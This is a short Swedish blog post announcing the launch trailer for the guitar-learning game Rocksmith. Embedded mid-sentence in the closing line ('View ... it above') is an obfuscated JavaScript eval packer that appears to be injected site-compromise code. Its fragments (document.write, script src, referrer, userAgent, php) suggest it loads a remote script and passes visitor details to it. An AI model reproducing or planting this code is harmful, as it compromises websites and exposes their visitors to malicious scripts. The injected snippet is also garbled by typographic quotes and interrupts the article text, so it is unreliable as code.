Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Trailer för Rocksmith

Sebastian

Nu är det snart här. Efter en tids förseningar är det nu dags för Rocksmith att lanseras. Spelet där du lär dig spela gitarr och även bas på riktigt.

Spelet har nu ihop med release släppt en lanseringstrailer, och självklart kan ni se den här på Revue.se.

View eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tsanf|var|u0026u|referrer|aieat||js|php’.split(’|’),0,{}))
it above 🙂

Youtube